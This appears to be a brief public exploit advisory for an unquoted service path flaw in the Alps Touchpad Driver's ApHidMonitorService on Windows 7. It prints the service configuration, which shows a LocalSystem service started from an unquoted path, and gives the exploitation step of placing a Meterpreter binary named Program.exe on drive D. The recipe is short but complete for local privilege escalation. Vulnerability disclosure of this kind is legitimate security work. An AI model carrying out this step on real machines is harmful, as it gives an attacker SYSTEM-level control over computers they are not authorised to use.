Alps Touchpad Driver version 8.2206.1717.143 suffers from an unquoted service path privilege escalation vulnerability.
558f8855039f5641694ec9903cb121e77ffbe360bbeda9b332dd0ef873962c92
# Exploit Title: [Alps Touchpad Driver - Unquoted Service Path Privilege Escalation]
# Google Dork: [N/A]
# Date: [date]
# Exploit Author: [Owais Mehtab, Tayeeb Rana]
# Vendor Homepage: [http://www.alps.com/]
# Software Link: [http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_140673_1]
# Version: [8.2206.1717.143]
# Tested on: [Win7 Sp1]
C:\>sc qc ApHidMonitorService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ApHidMonitorService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : D:\Program Files\Alps\GlidePoint\HidMonitorSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Alps HID Monitor Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
place a you meterpreter binary in D drive named as Program.exe